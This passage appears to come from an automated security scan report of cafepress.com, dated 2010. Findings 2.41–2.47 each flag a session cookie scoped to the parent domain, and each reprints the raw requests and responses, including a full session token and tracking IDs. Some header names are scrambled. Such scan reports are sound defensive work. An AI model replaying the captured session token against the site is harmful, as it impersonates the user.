Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 49058
Date: Sun, 26 Dec 2010 13:48:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 49058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook
...[SNIP]...

2.41. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/catalogExp/RedirectWithSEOURL.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.cafepress.com/
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Content-Length: 0
Date: Sun, 26 Dec 2010 13:44:56 GMT
Connection: close
Set-Cookie: cp_ost=; domain=cafepress.com; expires=Sun, 26-Dec-2010 13:45:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

2.42. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/catalogExp/addtocarthelper.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: http://www.cafepress.com/cp/addtocart.aspx?
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Content-Length: 160
Date: Sun, 26 Dec 2010 13:44:56 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.cafepress.com/cp/addtocart.aspx?">here</a>.</h2>
</body></html>

2.43. http://www.cafepress.com/cp/info/about/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/info/about/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/info/about/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 46251
Date: Sun, 26 Dec 2010 13:44:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 46251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...

2.44. http://www.cafepress.com/cp/info/help/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/info/help/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/info/help/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Content-Length: 216
Date: Sun, 26 Dec 2010 13:44:51 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://help.cafepress.com/hc/s-74058960/cmd/kbresource/front_page!PAGETYPE?VisitorProfile=cafepress">here</a>.</h2>

...[SNIP]...

2.45. http://www.cafepress.com/cp/info/help/index.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/info/help/index.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/info/help/index.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.46. http://www.cafepress.com/cp/info/sell/index.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/info/sell/index.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/info/sell/index.aspx?area=learn&page=learn HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.47. http://www.cafepress.com/cp/moredetails.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/moredetails.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/moredetails.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
